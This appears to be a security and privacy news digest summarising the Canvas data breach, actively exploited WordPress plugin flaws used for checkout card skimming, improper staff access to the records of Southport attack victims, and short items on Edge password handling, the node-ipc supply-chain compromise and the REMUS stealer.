Key developments
Canvas breach exposes 200 million users
Instructure said ShinyHunters accessed Canvas data through Free-For-Teachers accounts and a vulnerability in the free-tier support ticket system, putting information from more than 200 million users at risk. The company temporarily shut down Free-For-Teacher accounts while it investigated and said the attackers agreed to return or delete the stolen data.
Why it matters
The breach shows how free-tier and support workflows can become a high-scale privacy exposure.
Sources & driving stories
MARKETBRIEF · Scott Elliott
Marketbrief coverageWordPress plugins expose checkout and site data
BleepingComputer reported active exploitation of a critical Funnel Builder bug in WordPress that lets unauthenticated attackers inject JavaScript into WooCommerce checkout pages. The payload is disguised as Google Tag Manager or Google Analytics code, opens a WebSocket connection to an external server, and can be used to steal customer payment card data. In a separate disclosure, Wordfence said Avada Builder flaws through 3.15.2 can expose files such as wp-config.php and, if WooCommerce was enabled and later deactivated, allow unauthenticated SQL injection; FunnelKit 3.15.0.3 and Avada 3.15.3 are the fixes.
Why it matters
WordPress sites remain exposed to both card skimming and credential theft through plugin bugs.
Sources & driving stories
BLEEPINGCOMPUTER · Bill Toulas
BleepingComputer coverageBLEEPINGCOMPUTER · Bill Toulas
BleepingComputer coverageNHS trust admits Southport records snooping
Aintree Hospital's parent trust, UHLG, admitted that 48 staff inappropriately accessed the medical records of Southport knife attack victims in the days after the July 2024 attack. The patients were told only this week, nearly two years later, after an internal audit and review; disciplinary actions ranged from informal counselling to a final written warning, and no staff were dismissed.
Why it matters
It underscores how internal access misuse and delayed notification can intensify privacy harm in healthcare.
Sources & driving stories
YAHOO
Yahoo coverageWorth noting
WORTH NOTING
Edge stops loading cleartext passwords
Microsoft is changing Edge after a researcher showed saved passwords were decrypted and left in process memory at startup.
WORTH NOTING
node-ipc leaks secrets over DNS
The npm supply-chain compromise uses DNS TXT queries to exfiltrate environment variables and local files, making it a stealthy credential-theft campaign.
WORTH NOTING
REMUS stealer shifts toward session theft
Flare's analysis shows the malware operator adding restore tokens, proxy support, and password-manager collection, signaling a move beyond simple password theft.
Still unclear
OPEN QUESTION
Which other free-tier support systems expose data?
Canvas suggests SaaS vendors may have hidden exposure paths in support tooling and low-privilege account flows.
OPEN QUESTION
How fast can WordPress sites purge skimmers?
Active checkout-script injection means detection and removal speed now matter as much as patching.